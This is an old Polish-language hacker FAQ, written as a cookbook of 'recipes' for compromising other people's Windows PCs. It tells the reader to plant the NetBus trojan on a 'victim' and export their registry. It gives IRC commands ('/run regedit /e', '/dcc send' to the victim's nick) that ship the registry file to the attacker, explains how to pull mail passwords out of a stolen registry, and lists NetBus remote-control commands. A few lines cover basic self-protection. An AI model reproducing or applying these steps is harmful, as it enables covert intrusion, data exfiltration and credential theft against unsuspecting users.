-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                      BBBBB      	     222
		      B    B   eeeee        2   2
  FAQ #1              BBBBB   e     e          2
                      B    B  eeeeeee  -=-    2
                      B    B  e              2
                      BBBBB    eeeee        22222

          Be-2 czyli KUCHNIA DLA KOMPA !  KILKA PRZEPISOW DLA KAZDEGO !

						email : einbart@priv4.onet.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        PAMIETAJ  !!!!
             
           WSZYSTKIE TE MATERIALY SLUZA JEDYNIE CELOM EDUKACYJNYM!
		NIE MOGA BYC UZYTE NIEZGODNIE Z ICH PRZEZNACZENIEM! ;)
 			NIE MOGA BYC UDOSTEPNIONE NAUCZYCIELOM W SZKOLE!
                            ( bo gdzie indziej znalezc takich frajerow ! :) )
				SORRY JEZELI NIECHCACY ZASSALEM CZYJS FAQ !

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 	1.Wstepca

        2.REG : 
            a) jak zdobyc
            b) po co mi to ? ... ( lameriada )
            
        3.Security :
            a) bowl ( lameriada )
            b) format? deltree? ...?  ( lameriada )
            c) mail ?... a od kogo ?  ( lameriada )

        4.Bug in REG :
            a) HakTek
            b) Haslo

        5. LAMERIADA : 
            a) NetBus 1.70

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LET`s COOK -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  	1.Wstepca
 
              Yo! CZe!

              Wiec jest to moj pierwszy FAQ wiec ... ( sam nie wiem co )!
      Narazie przedstawiam tylko tyle...moze dlatego ze tylko tego jestem
       pewien. Nie zaliczam sie do hackerskiej elity ani tez do lameriady!
              Ten i nastepne FAQi ( mam nadzieje ze bedzie ich sporo ) sa
       na podstawie ksiazki kucharskiej ;) tylko tyle ze przepisy sa inne!
       NO i zeby nie bylo ze cos nie powiedzialem wiec MOWIE : BLE BLE !

            PRZEPIS : { nazwa przepisu }
            CZAS : { minimalny czas wykonania ( co to qrfa wyscigi ;) )}
            DZIALA : { w ilu % zadziala }
	    SKLADNIKI : { to co bedzie do tego potrzebne }

  

    	2.REG
           
           Czasem zaczynam nawet lubiec gateza ;) ... tyle zabawy co
         nam dostarcza ( niestety wiecej klopotow ;( ) ze szkoda
         mi sie go robi ;) ! Teraz i tez nie zapomnial o nas! Zrobil
         cos takiego jak rejestr ( roz: *.reg ) i regedit! W rejestrze
         wszystko jest zapisane ( lacznie o ktorej chodzimy lac ;) )
          Mozna zawsze sciagac wybrany klucz , ale z doswiadczenia wiem
          ze lepiej sciagnac caly!

 a) jak zdobyc ?

          # **************************************** #
          #  PRZEPIS : Zdobyc rega trojanem!         #
          #  CZAS : 10min                            #
          #  DZIALA : 100%                           # 
          #  SKLADNIKI : trojan ( polecam NETBUSa )  #
          # **************************************** #

       Wiec nie mam ochoty sie opisywac wiec to jest tylko dla inteligent ;) !

       1. Wciskamy trojana OFIERZE
       2. OFIARA uruchamia
       3. Wykonujemy program : regedit /e c:\info.reg
       4. sciagamy info.reg
      
       TYLE !  Zawsze zapisz sobie nick ofiary ... moze jeszcze raz go
                spotkasz!

          # **************************************** #
          #  PRZEPIS : Zdobyc rega przez IRC!        #
          #  CZAS : 10min                            #
          #  DZIALA : 70%                            # 
          #  SKLADNIKI : moze byc np skrypt          #
          # **************************************** #
      
           Mozna te komendy wstawic do skryptu lub ofiara
      moze je uruchomic samodzielnie :) ! Ale 
     te dwie komendy powinny byc wykonane !

-------------------------------------
/run regedit /e C:\info.reg
/dcc send {nick ofiary} C:\xxx.reg
-------------------------------------

  1.ofira lyka skrypt lub uruchamia!
  2.reszta to automatyk

  TYLE!


    b) po co mi to ?... ( lameriada )

           W REGU jest bardzo duzo informacji o kompie ofiary...
             ( Dobra lame tyle ci wystarczy :) )
           DALEJ PATRZ  4.Bug!


       3. Security        
         
                Jest tu kilka textow o zabezpieczeniu ale tak prymitywnych
         ze to jest TOTAL LAMERIADA ! Jak to przeczytasz to sie znizysz do
         LAME LEVEL ! ;)
 

      a) bowl

          # **************************************** #
          #  PRZEPIS : Wywalic bowl!                 #
          #  CZAS : 3min                             #
          #  DZIALA : 100%                           # 
          #  SKLADNIKI : zainstalowany bowl ;)       #
          # **************************************** #

         1.usuwasz plik z C:\WINDOWS o nazwie NETPOPUP.EXE
         2.usuwasz klucz z ...RunService ta linijke z NETPOPUP.EXE
 
        TYLE!

     b) format?.......
       
          # ********************************************* #
          #  PRZEPIS : Jak uniknac destrukcji !           #
          #  CZAS : 123 sekund                            #
          #  DZIALA : 50% powod patrz ALE:                # 
          #  SKLADNIKI : format.exe fdisk.exe deltree.exe #
          # ********************************************* #

	1.zmieniasz nazwe lub usuwasz ;) w/w pliki

        ALE: zawsze te pliki mozna zgrac na dysk i je uruchomic!

     c) mail?.........
  
          # ********************************************* #
          #  PRZEPIS : Rozpoznaj swojego listonosza !     #
          #  CZAS : 120 sekund                            #
          #  DZIALA : 95%                                 # 
          #  SKLADNIKI : maila i cos do poczty (OUTLOOK)  #
          # ********************************************* #

       1.zaznaczasz otrzymany list
       2.dajesz wlasciwosci
      
         TYLE!


     4. Bug in REG :
 
        Co to REG patrz punkt 2.!

     a)HakTek
      
          # ********************************************* #
          #  PRZEPIS : Jak dostac haslo maila !           #
          #  CZAS : 15min                                 #
          #  DZIALA : 100%                                # 
          #  SKLADNIKI : REG ofiary i cos do podgladu go  #
          # ********************************************* #

        1.dajemy podglad REGa
        2.szukamy "haktek" lub "password"

     TYLE!
 
        Na czym to polega?
  
         HakTek nie koduje hasla i zostawia je w pozycji literowej!
         Musi byc spelniony jeden warunek! : Ofiara choc raz musi uzyc
         ANTI-MAILBOMBERa! Oczywiscie z prawdziwymi danymi ;) !



       b) Haslo

              TEN PRZEPIS JEST SCIAGNIETY Z ... { jakiegos FAQa :) }
               SORRY Ale nie pamietam! TYLKO przypomne!

          # **************************************** #
          #  PRZEPIS : Jak zdobyc haslo!             #
          #  CZAS : 3min                             #
          #  DZIALA : 50%                            # 
          #  SKLADNIKI : jak wyzej :)                #
          # **************************************** #

        1.dajemy podglad REGa
        2.szukamy "pop3" lub "password"

       ALE: haslo jest zakodowane 

     TERAZ MOJ KAWALEK ! ORGINAL!
 
                 Probowalem wkleic dane ofiray do swojego rejestru ale mi
        nie wychodzilo! MOZE komus sie uda!


       5. LAMERIADA
 
    Ostatnio otrzymalem mail : " Czy mozna sterowac NETBUSem przez TELNET?"
 - Jasne ze sie da!
      KILKA KOMEND! Ale mozliwosci sa duzo ograniczone!
 KOMENDA:        OPIS:

  GetUser         info o ofierze
  GetVolume	  info o ustawieniach karty muzycznej - glosnosc
  GetApps         info o aktywnych oknach
  SendKeys;wyraz  wysyla wyraz { za wyraz wstawiasz swoj text ;) )
  StartApp;co     uruchamia program o sciezce CO lub nazwie pliku
  SwapButton;0/1  domysl sie. 0-wylaczone 1-wlaczone
  SetMousePos;x;y ustawia myszke o wspolzednych X i Y
  Eject;0/1       wysuwa cdrom 0-zchowaj 1-wysun

        Na razie TYLE! 

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  WIEC KONIEC ... NA RAZIE !!! 
  
          Napewno jeszcze jeden napisze ! 
            Milego pichcenia!

     Pozdrawiam LUD z #chackpl , #mlodziez !
      wojtusa,Sobiego,JaQbka,Yogiego,JOTa,cyberpita, i inych ktorych znam!

                         @ PA @ PA @ PA @
